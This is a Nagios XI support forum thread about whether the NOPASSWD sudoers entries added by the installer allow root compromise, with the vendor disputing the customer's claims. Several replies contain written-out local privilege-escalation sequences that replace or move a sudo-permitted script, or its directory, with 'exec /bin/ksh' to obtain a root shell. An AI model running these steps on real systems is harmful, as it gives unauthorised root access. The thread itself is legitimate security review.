Nagios XI - sudoers Problem

[kodlan]

Hi There,

We are currently trying to implement Nagios into our environment.

Our IT Security is not approving it due to lines like the below being put into the /etc/sudoers file during the installation.

This is apparently root compromise.

Could someone shed some light on this or a workaround ?


NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/components/getprofile.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/upgrade_to_latest.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/change_timezone.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/manage_services.sh *
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/reset_config_perms.sh
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/manage_ssl_config.sh *
NAGIOSXI ALL = NOPASSWD:/usr/local/nagiosxi/scripts/backup_xi.sh *

[scottwilkerson]

These are required for the nagios user to run some essential scripts on the Nagios XI server and there isn't any work around.

Can they give any example of how this is root compromised?

We take security very seriously and if there is infact a root compromise we would address that issue.

[kodlan]

Good Day Scott,

Thank you for your response,
I am pasting below the exact response that our IT Security provided to me.

---------------------------------------------------------------------------------------------
OK if the sudo were permitted then here is how you can get full root access.
Three Quick and easy root access …….
Here is how you as a Nagios user can become full root totally undocumented.

$ cd /usr/local/nagiosxi/scripts
$ mv change_timezone.sh change_timezone.sh_orig
$ echo “exec /bin/ksh” > change_timezone.sh
$ chmod 755 change_timezone.sh
$ sudo /usr/local/nagiosxi/scripts/change_timezone.sh
#
OR
$ cp /etc/init.d/npcd $HOME/init.d_npcd
$ echo “exec /bin/ksh” > /etc/init.d/npcd Or $ echo “exec /bin/ksh” >> /etc/init.d/npcd
$ sudo /etc/init.d/npcd
#
OR
$ cd /usr/local/nagiosxi/
$ mv html html_orig
$ mkdir -p html/includes/components/profile
$ echo “exec /bin/ksh” > html/includes/components/profile/getprofile.sh
$ chmod 755 html/includes/components/profile/getprofile.sh
$ sudo /usr/local/nagiosxi/html/includes/components/profile/getprofile.sh
#


Now the reasons why is the Nagios user owns the directory structure and can write / over write the file / directories.

The owner of the directory structure is not restricted to root only with only root having write access……. And one of the scripts does change the ownership and permissions of these structures.

The following commands are not totally owned by root and thus permitting them to run as root will lead to a root compromise.

Linux psbsamon01v.standardbank.co.za 3.10.0-862.el7.x86_64 #1 SMP Wed Mar 21 18:14:51 EDT 2018 x86_64 x86_64 x86_64 GNU/Linux
drwxr-xr-x. 91 root root 8192 Mar 28 07:34 /etc
lrwxrwxrwx. 1 root root 11 Aug 16 2018 /etc/init.d -> rc.d/init.d
-rwxr-xr-x 1 nagios nagios 2110 Feb 19 18:38 /etc/init.d/npcd
drwxr-xr-x. 14 root root 168 Aug 16 2018 /usr
drwxr-xr-x. 14 root root 168 Aug 16 2018 /usr
-rwxr-xr-x. 1 root root 4618216 Jun 19 2018 /usr/bin/php
drwxr-xr-x. 18 root root 219 Mar 6 15:05 /usr/local
drwxr-xr-x 10 nagios nagios 102 Mar 6 15:05 /usr/local/nagiosxi
-rw-r--r-- 1 root nagios 173073 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
-rw-r--r-- 1 root nagios 173073 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/autodiscovery/scripts/autodiscover_new.php
-rwxr-xr-x 1 root nagios 13061 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/profile/getprofile.sh
-rwxr-xr-x 1 root nagios 13061 Mar 6 15:05 /usr/local/nagiosxi/html/includes/components/profile/getprofile.sh
drwxr-xr-x 3 nagios nagios 4096 Mar 28 08:19 /usr/local/nagiosxi/scripts
-rwxr-xr-x 1 root nagios 7625 Mar 6 15:05 /usr/local/nagiosxi/scripts/backup_xi.sh
-rwxr-xr-x 1 root nagios 1800 Mar 6 15:05 /usr/local/nagiosxi/scripts/change_timezone.sh
-rwxr-xr-x 1 root nagios 2634 Mar 6 15:05 /usr/local/nagiosxi/scripts/manage_services.sh
-rwxr-xr-x 1 root nagios 2634 Mar 6 15:05 /usr/local/nagiosxi/scripts/manage_services.sh
-rwxr-xr-x 1 root nagios 3815 Mar 6 15:05 /usr/local/nagiosxi/scripts/manage_ssl_config.sh
-rwxr-xr-x 1 root nagios 1688 Mar 6 15:05 /usr/local/nagiosxi/scripts/repair_databases.sh
-rwxr-xr-x 1 root nagios 3604 Mar 6 15:05 /usr/local/nagiosxi/scripts/reset_config_perms.sh
-rwxr-xr-x 1 root nagios 2914 Mar 6 15:05 /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
[12:40:20] ~
----------------------------------------------------------------------------------------------------------------

[scottwilkerson]

What version of XI are you running? I believe these were fixed in the current version

Code: Select all

# cd /usr/local/nagiosxi/scripts/
[root@localhost scripts]# ll change_timezone.sh
-r-xr-x--- 1 root nagios 1800 Apr 30 09:24 change_timezone.sh
[root@localhost scripts]# su nagios
[nagios@localhost scripts]$ mv change_timezone.sh change_timezone.sh_orig
mv: cannot move `change_timezone.sh' to `change_timezone.sh_orig': Permission denied
[nagios@localhost scripts]$ echo “exec /bin/ksh” > change_timezone.sh
bash: change_timezone.sh: Permission denied
[nagios@localhost scripts]$ echo “exec /bin/ksh” > /etc/init.d/npcd
bash: /etc/init.d/npcd: Permission denied
[nagios@localhost scripts]$

[kodlan]

We Installed version 5.6.1.

Could you maybe give me a short briefing what i can provide to my IT Security team to relook this then please ?

Thanks in advance.

[scottwilkerson]

Well for one example, per the info you gave above /usr/local/nagiosxi/scripts/change_timezone.sh is only writable by root, so you would already need to be root to perform the commands you mentioned.

[kodlan]

Th response from our IT Security:

The risk is /usr/local/nagiosxi is not owned by root and nmagios can change / modify any of the files / folders in this directory thus nothing in or below this directory will be catered to run as root.

[scottwilkerson]

The permissions on /usr/local/nagiosxi/scripts/change_timezone.sh are

Code: Select all

-rwxr-xr-x 1 root nagios 1800 Mar 6 15:05 /usr/local/nagiosxi/scripts/change_timezone.sh

This makes it such that the nagios user can execute the script but cannot modify it or move it

Code: Select all

# su nagios
# mv /usr/local/nagiosxi/scripts/change_timezone.sh /usr/local/nagiosxi/scripts/change_timezone.sh_move
mv: cannot move `/usr/local/nagiosxi/scripts/change_timezone.sh' to `/usr/local/nagiosxi/scripts/change_timezone.sh_move': Permission denied

[kodlan]

If you own the directory above any script you can move the directory out and replace it with your own and your own permissions.

$ cd /usr/local/nagiosxi/
$ mv scripts scripts_orig
$ mkdir -p scripts
$ echo “exec /bin/ksh” > scripts/change_timezone.sh
$ chmod 755 scripts/change_timezone.sh
$ sudo /usr/local/nagiosxi/scripts/change_timezone.sh
#

[scottwilkerson]

But you don't

Code: Select all

ls -dl /usr/local/nagiosxi/
drwxr-xr-x 10 root nagios 4096 Jan  9  2012 /usr/local/nagiosxi/